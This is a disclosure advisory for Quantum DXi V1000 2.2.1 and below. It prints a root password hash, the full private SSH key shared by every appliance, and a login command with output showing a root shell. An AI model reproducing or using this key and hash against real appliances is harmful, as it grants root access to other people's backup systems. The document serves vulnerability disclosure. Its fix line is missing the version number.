Quantum DXi V1000 2.2.1 SSH Key / Root User

Credit: xistence
Risk: High
Local: Yes
Remote: No

----------- Author: ----------- xistence < xistence[at]0x90[.]nl > ------------------------- Affected products: ------------------------- Quantum DXi V1000 2.2.1 and below ------------------------- Affected vendors: ------------------------- Quantum http://quantum.com/ ------------------------- Product description: ------------------------- Quantum DXi&#174; V-Series is a virtual deduplication backup appliance that protects physical and virtual data across remote sites, the datacenter and cloud deployments. ---------- Details: ---------- [ 0x01 - Default root user ] The root user has a hardcoded password that is unknown and not changeable. Normally access is only through the restricted shells. The /etc/shadow file shows the following hash: root:$1$FGOgdWM7$dac9P0EJgTSX8a4zc4TXJ/:15783:0:99999:7::: [ 0x02 - Known SSH Private Key ] The /root/.ssh/authorized_keys on the appliance contains the following key (same with every deployment): -----BEGIN DSA PRIVATE KEY----- MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2 hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2 +o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4 6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5 PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK 6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u B3Upsx556K/iZPPnJZE= -----END DSA PRIVATE KEY----- Using the key on a remote system to login through SSH will give a root shell: $ ssh -i quantum.key root@ Last login: Mon Sep 23 21:27:19 2013 from Product Model = DXiV1000 Hardware Configuration = V1000 System Version = 2.2.1_MC Base OS Version = 2.2.1_MC-9499 Application Version = 2.2.1_MC-50278 SCM Build Version = Build14 Kernel Version = 2.6.18-164.15.1.qtm.4 [root@DXi000C29FB1EA1 ~]# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),103(adic) ----------- Solution: ----------- Upgrade to version or newer -------------- Timeline: -------------- 30-09-2013 - Issues discovered and vendor notified 30-09-2013 - Reply from vendor asking for more details 01-10-2013 - Supplied more details how to replicate 19-11-2013 - Asked for status update 19-11-2013 - Reply from vendor that an updated release is due for March 2014 xx-xx-2014 - Quantum DXi V1000 released 17-03-2014 - Public disclosure

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